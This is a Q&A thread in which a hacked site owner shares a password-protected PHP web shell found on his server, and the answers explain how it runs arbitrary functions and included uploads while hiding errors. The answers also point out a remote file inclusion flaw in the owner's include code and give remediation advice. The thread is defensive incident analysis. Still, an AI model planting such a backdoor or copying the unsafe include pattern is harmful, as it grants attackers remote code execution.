Got hacked! What does this PHP code do? And how should I avoid?

Question

I was hacked, and apparently they were sending spam emails. There were two files that they injected into my server (that were duplicated across all sub-directories). One is a heavily hashed PHP file that may be the sender. The code below is from the other file.

Here's my question -- What is this accomplishing? I can't translate its purpose. Also, what should I do to avoid allowing this to happen again?

<?php

if(@md5($_POST['pass'])!=='692e3f52ee6f16bc78fa6e1ec4bd4a6a')
    die();
@extract($_POST);

if(!empty($a))
    @$a($b);

if(!empty($_FILES['tmp_name']))
    @include($_FILES['tmp_name']);

?>

Answer 1

rename the file immediately (to something other than .php) before further inspecting it, so any malicious user can't use it anymore.

Then investigate to how they were able to inject this on your server.

In your access logs you will find page-loads that load that specific PHP file. That will be your first clue. Investigate other connections from the same IP address for example and look at what scripts they have accessed/abused. Somewhere you will probably find you have an outdated/vulnerable wordpress plug-in, joomla plug-in, etc. Update or remove that plug-in ASAP, or you will be hacked again soon!

Also when checking your access logs, see if they have uploaded new backdoors! Maybe you see some scripts being called by the same IP address that should not exist. Delete/Rename them too!

What is code does is pretty simple, yet pretty advanced: It allows the holder of the password to execute any code you would be able to execute through PHP. The advanced bit is that it is difficult to detect. It uses no base64, no eval, etc.

edit:

idealizm said in the comments:

I'm actually not using Wordpress (or any other CMS) on this domain -- but I do have an index.php file which handles the dynamic creation of various pages by doing an include of an existing file prefixed with an underscore -- so index.php?go=about would include("about.php"). It checks if the file exists, and, if not, only includes the default file. I was hoping that this was secure enough. Is this where they might have exploited my code? ` if ($_GET['go']=='') { $go = 'videos'; } else { $go = $_GET['go']; } if (!(file_exists(''.$go.'.php'))) { $go = 'videos'; }

Yes, there can be your problem! You say the included file is prefixed with an underscore, but I don't see that in your code... So, if the hacker went to index.php?go=http://hackerssite.com/hackerscode , you would end up including http://hackerssite.com/hackerscode.php code, and allow for havoc!

Remove (and never allow) the code inclusion of direct user input. Check $_GET['go'] against an array of allowed include pages, or use a switch to call the include.

Answer 2

Seems like it's executing a function whose name is given via $_POST['a'] with the value from $_POST['b'] as a paremeter and than includes a file which is uploaded via a form.

So basically it lets the user execute PHP files and functions on your server.

Delete or rename this file immediately to avoid any further usage.

Answer 3

This allows them up run any function they want and allows them to upload a file and have it immediately included and parsed as PHP... it's as close to full access as you can get after root. Here's the full breakdown:

1. Allow the attacked to make sure they are the only one able to issue an attack (a simple password protected)

   if(@md5($_POST['pass'])!=='692e3f52ee6f16bc78fa6e1ec4bd4a6a') die();

2. Pull all the POST variables out as their own variables and then pass in any function name ($a) and call it (passing in the POST variable $b). - this allows them to run any loaded function (including things like exec if your system allows it)

   @extract($_POST);
if(!empty($a)) @$a($b);

3. Allow the attacker to upload a file (any file) and have it automatically included in the PHP script.

   if(!empty($_FILES['tmp_name'])) @include($_FILES['tmp_name']);

Also, the @ in front of each statement supresses errors, so it won't show up in the error log if you're auditing that.